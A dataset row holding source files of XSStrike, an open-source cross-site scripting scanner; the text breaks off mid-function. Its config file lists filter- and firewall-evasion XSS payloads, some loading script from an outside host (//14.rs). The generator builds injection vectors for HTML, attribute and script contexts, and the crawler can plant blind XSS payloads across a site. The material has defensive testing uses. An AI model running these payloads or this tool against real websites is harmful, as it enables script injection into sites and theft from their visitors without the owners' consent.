repo_name
stringlengths 3
38
| repo_commit
stringlengths 40
40
| repo_content
stringlengths 0
949k
| repo_readme
stringlengths 34
275k
|
---|---|---|---|
XSStrike | f29278760453996c713af908376d6dab24e61692 | File: xsstrike.py
#!/usr/bin/env python3
from __future__ import print_function
from core.colors import end, red, white, bad, info
# Just a fancy ass banner
print('''%s
\tXSStrike %sv3.1.5
%s''' % (red, white, end))
try:
import concurrent.futures
from urllib.parse import urlparse
try:
import fuzzywuzzy
except ImportError:
import os
print ('%s fuzzywuzzy isn\'t installed, installing now.' % info)
ret_code = os.system('pip3 install fuzzywuzzy')
if(ret_code != 0):
print('%s fuzzywuzzy installation failed.' % bad)
quit()
print ('%s fuzzywuzzy has been installed, restart XSStrike.' % info)
quit()
except ImportError: # throws error in python2
print('%s XSStrike isn\'t compatible with python2.\n Use python > 3.4 to run XSStrike.' % bad)
quit()
# Let's import whatever we need from standard lib
import sys
import json
import argparse
# ... and configurations core lib
import core.config
import core.log
# Processing command line arguments, where dest var names will be mapped to local vars with the same name
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='url', dest='target')
parser.add_argument('--data', help='post data', dest='paramData')
parser.add_argument('-e', '--encode', help='encode payloads', dest='encode')
parser.add_argument('--fuzzer', help='fuzzer',
dest='fuzz', action='store_true')
parser.add_argument('--update', help='update',
dest='update', action='store_true')
parser.add_argument('--timeout', help='timeout',
dest='timeout', type=int, default=core.config.timeout)
parser.add_argument('--proxy', help='use prox(y|ies)',
dest='proxy', action='store_true')
parser.add_argument('--crawl', help='crawl',
dest='recursive', action='store_true')
parser.add_argument('--json', help='treat post data as json',
dest='jsonData', action='store_true')
parser.add_argument('--path', help='inject payloads in the path',
dest='path', action='store_true')
parser.add_argument(
'--seeds', help='load crawling seeds from a file', dest='args_seeds')
parser.add_argument(
'-f', '--file', help='load payloads from a file', dest='args_file')
parser.add_argument('-l', '--level', help='level of crawling',
dest='level', type=int, default=2)
parser.add_argument('--headers', help='add headers',
dest='add_headers', nargs='?', const=True)
parser.add_argument('-t', '--threads', help='number of threads',
dest='threadCount', type=int, default=core.config.threadCount)
parser.add_argument('-d', '--delay', help='delay between requests',
dest='delay', type=int, default=core.config.delay)
parser.add_argument('--skip', help='don\'t ask to continue',
dest='skip', action='store_true')
parser.add_argument('--skip-dom', help='skip dom checking',
dest='skipDOM', action='store_true')
parser.add_argument('--blind', help='inject blind XSS payload while crawling',
dest='blindXSS', action='store_true')
parser.add_argument('--console-log-level', help='Console logging level',
dest='console_log_level', default=core.log.console_log_level,
choices=core.log.log_config.keys())
parser.add_argument('--file-log-level', help='File logging level', dest='file_log_level',
choices=core.log.log_config.keys(), default=None)
parser.add_argument('--log-file', help='Name of the file to log', dest='log_file',
default=core.log.log_file)
args = parser.parse_args()
# Pull all parameter values of dict from argparse namespace into local variables of name == key
# The following works, but the static checkers are too static ;-) locals().update(vars(args))
target = args.target
path = args.path
jsonData = args.jsonData
paramData = args.paramData
encode = args.encode
fuzz = args.fuzz
update = args.update
timeout = args.timeout
proxy = args.proxy
recursive = args.recursive
args_file = args.args_file
args_seeds = args.args_seeds
level = args.level
add_headers = args.add_headers
threadCount = args.threadCount
delay = args.delay
skip = args.skip
skipDOM = args.skipDOM
blindXSS = args.blindXSS
core.log.console_log_level = args.console_log_level
core.log.file_log_level = args.file_log_level
core.log.log_file = args.log_file
logger = core.log.setup_logger()
core.config.globalVariables = vars(args)
# Import everything else required from core lib
from core.config import blindPayload
from core.encoders import base64
from core.photon import photon
from core.prompt import prompt
from core.updater import updater
from core.utils import extractHeaders, reader, converter
from modes.bruteforcer import bruteforcer
from modes.crawl import crawl
from modes.scan import scan
from modes.singleFuzz import singleFuzz
if type(args.add_headers) == bool:
headers = extractHeaders(prompt())
elif type(args.add_headers) == str:
headers = extractHeaders(args.add_headers)
else:
from core.config import headers
core.config.globalVariables['headers'] = headers
core.config.globalVariables['checkedScripts'] = set()
core.config.globalVariables['checkedForms'] = {}
core.config.globalVariables['definitions'] = json.loads('\n'.join(reader(sys.path[0] + '/db/definitions.json')))
if path:
paramData = converter(target, target)
elif jsonData:
headers['Content-type'] = 'application/json'
paramData = converter(paramData)
if args_file:
if args_file == 'default':
payloadList = core.config.payloads
else:
payloadList = list(filter(None, reader(args_file)))
seedList = []
if args_seeds:
seedList = list(filter(None, reader(args_seeds)))
encoding = base64 if encode and encode == 'base64' else False
if not proxy:
core.config.proxies = {}
if update: # if the user has supplied --update argument
updater()
quit() # quitting because files have been changed
if not target and not args_seeds: # if the user hasn't supplied a url
logger.no_format('\n' + parser.format_help().lower())
quit()
if fuzz:
singleFuzz(target, paramData, encoding, headers, delay, timeout)
elif not recursive and not args_seeds:
if args_file:
bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout)
else:
scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip)
else:
if target:
seedList.append(target)
for target in seedList:
logger.run('Crawling the target')
scheme = urlparse(target).scheme
logger.debug('Target scheme: {}'.format(scheme))
host = urlparse(target).netloc
main_url = scheme + '://' + host
crawlingResult = photon(target, headers, level,
threadCount, delay, timeout, skipDOM)
forms = crawlingResult[0]
domURLs = list(crawlingResult[1])
difference = abs(len(domURLs) - len(forms))
if len(domURLs) > len(forms):
for i in range(difference):
forms.append(0)
elif len(forms) > len(domURLs):
for i in range(difference):
domURLs.append(0)
threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount)
futures = (threadpool.submit(crawl, scheme, host, main_url, form,
blindXSS, blindPayload, headers, delay, timeout, encoding) for form, domURL in zip(forms, domURLs))
for i, _ in enumerate(concurrent.futures.as_completed(futures)):
if i + 1 == len(forms) or (i + 1) % threadCount == 0:
logger.info('Progress: %i/%i\r' % (i + 1, len(forms)))
logger.no_format('')
File: core/zetanize.py
import re
def zetanize(response):
def e(string):
return string.encode('utf-8')
def d(string):
return string.decode('utf-8')
# remove the content between html comments
response = re.sub(r'(?s)<!--.*?-->', '', response)
forms = {}
matches = re.findall(r'(?i)(?s)<form.*?</form.*?>',
response) # extract all the forms
num = 0
for match in matches: # everything else is self explanatory if you know regex
page = re.search(r'(?i)action=[\'"](.*?)[\'"]', match)
method = re.search(r'(?i)method=[\'"](.*?)[\'"]', match)
forms[num] = {}
forms[num]['action'] = d(e(page.group(1))) if page else ''
forms[num]['method'] = d(
e(method.group(1)).lower()) if method else 'get'
forms[num]['inputs'] = []
inputs = re.findall(r'(?i)(?s)<input.*?>', response)
for inp in inputs:
inpName = re.search(r'(?i)name=[\'"](.*?)[\'"]', inp)
if inpName:
inpType = re.search(r'(?i)type=[\'"](.*?)[\'"]', inp)
inpValue = re.search(r'(?i)value=[\'"](.*?)[\'"]', inp)
inpName = d(e(inpName.group(1)))
inpType = d(e(inpType.group(1)))if inpType else ''
inpValue = d(e(inpValue.group(1))) if inpValue else ''
if inpType.lower() == 'submit' and inpValue == '':
inpValue = 'Submit Query'
inpDict = {
'name': inpName,
'type': inpType,
'value': inpValue
}
forms[num]['inputs'].append(inpDict)
num += 1
return forms
File: core/wafDetector.py
import json
import re
import sys
from core.requester import requester
from core.log import setup_logger
logger = setup_logger(__name__)
def wafDetector(url, params, headers, GET, delay, timeout):
with open(sys.path[0] + '/db/wafSignatures.json', 'r') as file:
wafSignatures = json.load(file)
# a payload which is noisy enough to provoke the WAF
noise = '<script>alert("XSS")</script>'
params['xss'] = noise
# Opens the noise injected payload
response = requester(url, params, headers, GET, delay, timeout)
page = response.text
code = str(response.status_code)
headers = str(response.headers)
logger.debug('Waf Detector code: {}'.format(code))
logger.debug_json('Waf Detector headers:', response.headers)
if int(code) >= 400:
bestMatch = [0, None]
for wafName, wafSignature in wafSignatures.items():
score = 0
pageSign = wafSignature['page']
codeSign = wafSignature['code']
headersSign = wafSignature['headers']
if pageSign:
if re.search(pageSign, page, re.I):
score += 1
if codeSign:
if re.search(codeSign, code, re.I):
score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators
if headersSign:
if re.search(headersSign, headers, re.I):
score += 1
# if the overall score of the waf is higher than the previous one
if score > bestMatch[0]:
del bestMatch[:] # delete the previous one
bestMatch.extend([score, wafName]) # and add this one
if bestMatch[0] != 0:
return bestMatch[1]
else:
return None
else:
return None
File: core/config.py
changes = '''Negligible DOM XSS false positives;x10 faster crawling'''
globalVariables = {} # it holds variables during runtime for collaboration across modules
defaultEditor = 'nano'
blindPayload = '' # your blind XSS payload
xsschecker = 'v3dm0s' # A non malicious string to check for reflections and stuff
# More information on adding proxies: http://docs.python-requests.org/en/master/user/advanced/#proxies
proxies = {'http': 'http://0.0.0.0:8080', 'https': 'http://0.0.0.0:8080'}
minEfficiency = 90 # payloads below this efficiency will not be displayed
delay = 0 # default delay between http requests
threadCount = 10 # default number of threads
timeout = 10 # default number of http request timeout
# attributes that have special properties
specialAttributes = ['srcdoc', 'src']
badTags = ('iframe', 'title', 'textarea', 'noembed',
'style', 'template', 'noscript')
tags = ('html', 'd3v', 'a', 'details') # HTML Tags
# "Things" that can be used between js functions and breakers e.g. '};alert()//
jFillings = (';')
# "Things" that can be used before > e.g. <tag attr=value%0dx>
lFillings = ('', '%0dx')
# "Things" to use between event handler and = or between function and =
eFillings = ('%09', '%0a', '%0d', '+')
fillings = ('%09', '%0a', '%0d', '/+/') # "Things" to use instead of space
eventHandlers = { # Event handlers and the tags compatible with them
'ontoggle': ['details'],
'onpointerenter': ['d3v', 'details', 'html', 'a'],
'onmouseover': ['a', 'html', 'd3v']
}
functions = ( # JavaScript functions to get a popup
'[8].find(confirm)', 'confirm()',
'(confirm)()', 'co\u006efir\u006d()',
'(prompt)``', 'a=prompt,a()')
payloads = ( # Payloads for filter & WAF evasion
'\'"</Script><Html Onmouseover=(confirm)()//'
'<imG/sRc=l oNerrOr=(prompt)() x>',
'<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
'<deTails open oNToggle=confi\u0072m()>',
'<img sRc=l oNerrOr=(confirm)() x>',
'<svg/x=">"/onload=confirm()//',
'<svg%0Aonload=%09((pro\u006dpt))()//',
'<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
'<sCript x>confirm``</scRipt x>',
'<Script x>prompt()</scRiPt x>',
'<sCriPt sRc=//14.rs>',
'<embed//sRc=//14.rs>',
'<base href=//14.rs/><script src=/>',
'<object//data=//14.rs>',
'<s=" onclick=confirm``>clickme',
'<svG oNLoad=co\u006efirm(1)>',
'\'"><y///oNMousEDown=((confirm))()>Click',
'<a/href=javascript:co\u006efirm("1")>clickme</a>',
'<img src=x onerror=confir\u006d`1`>',
'<svg/onload=co\u006efir\u006d`1`>')
fuzzes = ( # Fuzz strings to test WAFs
'<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
'<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
'<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
'<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
'<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
'"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>')
headers = { # default headers
'User-Agent': '$',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
'DNT': '1',
'Upgrade-Insecure-Requests': '1',
}
blindParams = [ # common paramtere names to be bruteforced for parameter discovery
'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file',
'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email',
'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input',
'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid',
'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid',
'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width',
'height', 'add', 'result', 'log', 'demo', 'example', 'message']
File: core/htmlParser.py
import re
from core.config import badTags, xsschecker
from core.utils import isBadContext, equalize, escaped, extractScripts
def htmlParser(response, encoding):
rawResponse = response # raw response returned by requests
response = response.text # response content
if encoding: # if the user has specified an encoding, encode the probe in that
response = response.replace(encoding(xsschecker), xsschecker)
reflections = response.count(xsschecker)
position_and_context = {}
environment_details = {}
clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response)
script_checkable = clean_response
for script in extractScripts(script_checkable):
occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
if occurences:
for occurence in occurences:
thisPosition = occurence.start(1)
position_and_context[thisPosition] = 'script'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {'quote' : ''}
for i in range(len(occurence.group())):
currentChar = occurence.group()[i]
if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
environment_details[thisPosition]['details']['quote'] = currentChar
elif currentChar in (')', ']', '}', '}') and not escaped(i, occurence.group()):
break
script_checkable = script_checkable.replace(xsschecker, '', 1)
if len(position_and_context) < reflections:
attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response)
for occurence in attribute_context:
match = occurence.group(0)
thisPosition = occurence.start(1)
parts = re.split(r'\s', match)
tag = parts[0][1:]
for part in parts:
if xsschecker in part:
Type, quote, name, value = '', '', '', ''
if '=' in part:
quote = re.search(r'=([\'`"])?', part).group(1)
name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])
if xsschecker == name_and_value[0]:
Type = 'name'
else:
Type = 'value'
name = name_and_value[0]
value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
else:
Type = 'flag'
position_and_context[thisPosition] = 'attribute'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name}
if len(position_and_context) < reflections:
html_context = re.finditer(xsschecker, clean_response)
for occurence in html_context:
thisPosition = occurence.start()
if thisPosition not in position_and_context:
position_and_context[occurence.start()] = 'html'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {}
if len(position_and_context) < reflections:
comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response)
for occurence in comment_context:
thisPosition = occurence.start(1)
position_and_context[thisPosition] = 'comment'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {}
database = {}
for i in sorted(position_and_context):
database[i] = {}
database[i]['position'] = i
database[i]['context'] = position_and_context[i]
database[i]['details'] = environment_details[i]['details']
bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
non_executable_contexts = []
for each in bad_contexts:
non_executable_contexts.append([each.start(), each.end(), each.group(1)])
if non_executable_contexts:
for key in database.keys():
position = database[key]['position']
badTag = isBadContext(position, non_executable_contexts)
if badTag:
database[key]['details']['badTag'] = badTag
else:
database[key]['details']['badTag'] = ''
return database
File: core/log.py
import logging
from .colors import *
__all__ = ['setup_logger', 'console_log_level', 'file_log_level', 'log_file']
console_log_level = 'INFO'
file_log_level = None
log_file = 'xsstrike.log'
"""
Default Logging Levels
CRITICAL = 50
ERROR = 40
WARNING = 30
INFO = 20
DEBUG = 10
"""
VULN_LEVEL_NUM = 60
RUN_LEVEL_NUM = 22
GOOD_LEVEL_NUM = 25
logging.addLevelName(VULN_LEVEL_NUM, 'VULN')
logging.addLevelName(RUN_LEVEL_NUM, 'RUN')
logging.addLevelName(GOOD_LEVEL_NUM, 'GOOD')
def _vuln(self, msg, *args, **kwargs):
if self.isEnabledFor(VULN_LEVEL_NUM):
self._log(VULN_LEVEL_NUM, msg, args, **kwargs)
def _run(self, msg, *args, **kwargs):
if self.isEnabledFor(RUN_LEVEL_NUM):
self._log(RUN_LEVEL_NUM, msg, args, **kwargs)
def _good(self, msg, *args, **kwargs):
if self.isEnabledFor(GOOD_LEVEL_NUM):
self._log(GOOD_LEVEL_NUM, msg, args, **kwargs)
logging.Logger.vuln = _vuln
logging.Logger.run = _run
logging.Logger.good = _good
log_config = {
'DEBUG': {
'value': logging.DEBUG,
'prefix': '{}[*]{}'.format(yellow, end),
},
'INFO': {
'value': logging.INFO,
'prefix': info,
},
'RUN': {
'value': RUN_LEVEL_NUM,
'prefix': run,
},
'GOOD': {
'value': GOOD_LEVEL_NUM,
'prefix': good,
},
'WARNING': {
'value': logging.WARNING,
'prefix': '[!!]'.format(yellow, end),
},
'ERROR': {
'value': logging.ERROR,
'prefix': bad,
},
'CRITICAL': {
'value': logging.CRITICAL,
'prefix': '{}[--]{}'.format(red, end),
},
'VULN': {
'value': VULN_LEVEL_NUM,
'prefix': '{}[++]{}'.format(green, red),
}
}
class CustomFormatter(logging.Formatter):
def format(self, record):
msg = super().format(record)
if record.levelname in log_config.keys():
msg = '%s %s %s' % (log_config[record.levelname]['prefix'], msg, end)
return msg
class CustomStreamHandler(logging.StreamHandler):
default_terminator = '\n'
def emit(self, record):
"""
Overrides emit method to temporally update terminator character in case last log record character is '\r'
:param record:
:return:
"""
if record.msg.endswith('\r'):
self.terminator = '\r'
super().emit(record)
self.terminator = self.default_terminator
else:
super().emit(record)
def _switch_to_no_format_loggers(self):
self.removeHandler(self.console_handler)
self.addHandler(self.no_format_console_handler)
if hasattr(self, 'file_handler') and hasattr(self, 'no_format_file_handler'):
self.removeHandler(self.file_handler)
self.addHandler(self.no_format_file_handler)
def _switch_to_default_loggers(self):
self.removeHandler(self.no_format_console_handler)
self.addHandler(self.console_handler)
if hasattr(self, 'file_handler') and hasattr(self, 'no_format_file_handler'):
self.removeHandler(self.no_format_file_handler)
self.addHandler(self.file_handler)
def _get_level_and_log(self, msg, level):
if level.upper() in log_config.keys():
log_method = getattr(self, level.lower())
log_method(msg)
else:
self.info(msg)
def log_red_line(self, amount=60, level='INFO'):
_switch_to_no_format_loggers(self)
_get_level_and_log(self, red + ('-' * amount) + end, level)
_switch_to_default_loggers(self)
def log_no_format(self, msg='', level='INFO'):
_switch_to_no_format_loggers(self)
_get_level_and_log(self, msg, level)
_switch_to_default_loggers(self)
def log_debug_json(self, msg='', data={}):
if self.isEnabledFor(logging.DEBUG):
if isinstance(data, dict):
import json
try:
self.debug('{} {}'.format(msg, json.dumps(data, indent=2)))
except TypeError:
self.debug('{} {}'.format(msg, data))
else:
self.debug('{} {}'.format(msg, data))
def setup_logger(name='xsstrike'):
from types import MethodType
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
console_handler = CustomStreamHandler(sys.stdout)
console_handler.setLevel(log_config[console_log_level]['value'])
console_handler.setFormatter(CustomFormatter('%(message)s'))
logger.addHandler(console_handler)
# Setup blank handler to temporally use to log without format
no_format_console_handler = CustomStreamHandler(sys.stdout)
no_format_console_handler.setLevel((log_config[console_log_level]['value']))
no_format_console_handler.setFormatter(logging.Formatter(fmt=''))
# Store current handlers
logger.console_handler = console_handler
logger.no_format_console_handler = no_format_console_handler
if file_log_level:
detailed_formatter = logging.Formatter('%(asctime)s %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(log_config[file_log_level]['value'])
file_handler.setFormatter(detailed_formatter)
logger.addHandler(file_handler)
# Setup blank handler to temporally use to log without format
no_format_file_handler = logging.FileHandler(log_file)
no_format_file_handler.setLevel(log_config[file_log_level]['value'])
no_format_file_handler.setFormatter(logging.Formatter(fmt=''))
# Store file handlers
logger.file_handler = file_handler
logger.no_format_file_handler = no_format_file_handler
# Create logger method to only log a red line
logger.red_line = MethodType(log_red_line, logger)
# Create logger method to log without format
logger.no_format = MethodType(log_no_format, logger)
# Create logger method to convert data to json and log with debug level
logger.debug_json = MethodType(log_debug_json, logger)
return logger
File: core/__init__.py
File: core/encoders.py
import base64 as b64
import re
def base64(string):
if re.match(r'^[A-Za-z0-9+\/=]+$', string) and (len(string) % 4) == 0:
return b64.b64decode(string.encode('utf-8')).decode('utf-8')
else:
return b64.b64encode(string.encode('utf-8')).decode('utf-8')
File: core/requester.py
import random
import requests
import time
from urllib3.exceptions import ProtocolError
import warnings
import core.config
from core.utils import converter, getVar
from core.log import setup_logger
logger = setup_logger(__name__)
warnings.filterwarnings('ignore') # Disable SSL related warnings
def requester(url, data, headers, GET, delay, timeout):
if getVar('jsonData'):
data = converter(data)
elif getVar('path'):
url = converter(data, url)
data = []
GET, POST = True, False
time.sleep(delay)
user_agents = ['Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991']
if 'User-Agent' not in headers:
headers['User-Agent'] = random.choice(user_agents)
elif headers['User-Agent'] == '$':
headers['User-Agent'] = random.choice(user_agents)
logger.debug('Requester url: {}'.format(url))
logger.debug('Requester GET: {}'.format(GET))
logger.debug_json('Requester data:', data)
logger.debug_json('Requester headers:', headers)
try:
if GET:
response = requests.get(url, params=data, headers=headers,
timeout=timeout, verify=False, proxies=core.config.proxies)
elif getVar('jsonData'):
response = requests.post(url, json=data, headers=headers,
timeout=timeout, verify=False, proxies=core.config.proxies)
else:
response = requests.post(url, data=data, headers=headers,
timeout=timeout, verify=False, proxies=core.config.proxies)
return response
except ProtocolError:
logger.warning('WAF is dropping suspicious requests.')
logger.warning('Scanning will continue after 10 minutes.')
time.sleep(600)
except Exception as e:
logger.warning('Unable to connect to the target.')
return requests.Response()
File: core/updater.py
import os
import re
from requests import get
from core.config import changes
from core.colors import que, info, end, green
from core.log import setup_logger
logger = setup_logger(__name__)
def updater():
logger.run('Checking for updates')
latestCommit = get(
'https://raw.githubusercontent.com/s0md3v/XSStrike/master/core/config.py').text
if changes not in latestCommit: # just a hack to see if a new version is available
changelog = re.search(r"changes = '''(.*?)'''", latestCommit)
changelog = changelog.group(1).split(
';') # splitting the changes to form a list
logger.good('A new version of XSStrike is available.')
changes_str = 'Changes:\n'
for change in changelog: # prepare changes to print
changes_str += '%s>%s %s\n' % (green, end, change)
logger.info(changes_str)
currentPath = os.getcwd().split('/') # if you know it, you know it
folder = currentPath[-1] # current directory name
path = '/'.join(currentPath) # current directory path
choice = input('%s Would you like to update? [Y/n] ' % que).lower()
if choice != 'n':
logger.run('Updating XSStrike')
os.system(
'git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' %
(path, folder, path, path, folder))
logger.good('Update successful!')
else:
logger.good('XSStrike is up to date!')
File: core/generator.py
from core.config import xsschecker, badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions
from core.jsContexter import jsContexter
from core.utils import randomUpper as r, genGen, extractScripts
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
for i in occurences:
context = occurences[i]['context']
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, badTag)
for payload in payloads:
vectors[10].add(payload)
elif context == 'attribute':
found = False
tag = occurences[i]['details']['tag']
Type = occurences[i]['details']['type']
quote = occurences[i]['details']['quote'] or ''
attributeName = occurences[i]['details']['name']
attributeValue = occurences[i]['details']['value']
quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if greatBracketEfficiency == 100 and quoteEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + '>' + payload
found = True
vectors[9].add(payload)
if quoteEfficiency == 100:
for filling in fillings:
for function in functions:
vector = quote + filling + r('autofocus') + \
filling + r('onfocus') + '=' + quote + function
found = True
vectors[8].add(vector)
if quoteEfficiency == 90:
for filling in fillings:
for function in functions:
vector = '\\' + quote + filling + r('autofocus') + filling + \
r('onfocus') + '=' + function + filling + '\\' + quote
found = True
vectors[7].add(vector)
if Type == 'value':
if attributeName == 'srcdoc':
if occurences[i]['score']['<']:
if occurences[i]['score']['>']:
del ends[:]
ends.append('%26gt;')
payloads = genGen(
fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)
for payload in payloads:
found = True
vectors[9].add(payload.replace('<', '%26lt;'))
elif attributeName == 'href' and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r('javascript:') + function)
elif attributeName.startswith('on'):
closer = jsContexter(attributeValue)
quote = ''
for char in attributeValue.split(xsschecker)[1]:
if char in ['\'', '"', '`']:
quote = char
break
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
if quoteEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = '\\' + quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif tag in ('script', 'iframe', 'embed', 'object'):
if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker:
payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']
for payload in payloads:
vectors[10].add(payload)
elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:
for function in functions:
found = True
vectors[10].add(r('javascript:') + function)
elif quoteEfficiency == greatBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
payload = quote + '>' + r('</script/>') + payload
found = True
vectors[11].add(payload)
elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
elif context == 'script':
if scripts:
try:
script = scripts[index]
except IndexError:
script = scripts[0]
else:
continue
closer = jsContexter(script)
quote = occurences[i]['details']['quote']
scriptEfficiency = occurences[i]['score']['</scRipT/>']
greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = 100
if quote:
breakerEfficiency = occurences[i]['score'][quote]
ends = ['//']
if greatBracketEfficiency == 100:
ends.append('>')
if scriptEfficiency == 100:
breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends)
for payload in payloads:
vectors[10].add(payload)
if closer:
suffix = '//\\'
for filling in jFillings:
for function in functions:
vector = quote + closer + filling + function + suffix
vectors[7].add(vector)
elif breakerEfficiency > 83:
prefix = ''
suffix = '//'
if breakerEfficiency != 100:
prefix = '\\'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = prefix + quote + closer + filling + function + suffix
vectors[6].add(vector)
index += 1
return vectors
File: core/utils.py
import json
import random
import re
from urllib.parse import urlparse
import core.config
from core.config import xsschecker
def converter(data, url=False):
if 'str' in str(type(data)):
if url:
dictized = {}
parts = data.split('/')[3:]
for part in parts:
dictized[part] = part
return dictized
else:
return json.loads(data)
else:
if url:
url = urlparse(url).scheme + '://' + urlparse(url).netloc
for part in list(data.values()):
url += '/' + part
return url
else:
return json.dumps(data)
def counter(string):
string = re.sub(r'\s|\w', '', string)
return len(string)
def closest(number, numbers):
difference = [abs(list(numbers.values())[0]), {}]
for index, i in numbers.items():
diff = abs(number - i)
if diff < difference[0]:
difference = [diff, {index: i}]
return difference[1]
def fillHoles(original, new):
filler = 0
filled = []
for x, y in zip(original, new):
if int(x) == (y + filler):
filled.append(y)
else:
filled.extend([0, y])
filler += (int(x) - y)
return filled
def stripper(string, substring, direction='right'):
done = False
strippedString = ''
if direction == 'right':
string = string[::-1]
for char in string:
if char == substring and not done:
done = True
else:
strippedString += char
if direction == 'right':
strippedString = strippedString[::-1]
return strippedString
def extractHeaders(headers):
headers = headers.replace('\\n', '\n')
sorted_headers = {}
matches = re.findall(r'(.*):\s(.*)', headers)
for match in matches:
header = match[0]
value = match[1]
try:
if value[-1] == ',':
value = value[:-1]
sorted_headers[header] = value
except IndexError:
pass
return sorted_headers
def replaceValue(mapping, old, new, strategy=None):
"""
Replace old values with new ones following dict strategy.
The parameter strategy is None per default for inplace operation.
A copy operation is injected via strateg values like copy.copy
or copy.deepcopy
Note: A dict is returned regardless of modifications.
"""
anotherMap = strategy(mapping) if strategy else mapping
if old in anotherMap.values():
for k in anotherMap.keys():
if anotherMap[k] == old:
anotherMap[k] = new
return anotherMap
def getUrl(url, GET):
if GET:
return url.split('?')[0]
else:
return url
def extractScripts(response):
scripts = []
matches = re.findall(r'(?s)<script.*?>(.*?)</script>', response.lower())
for match in matches:
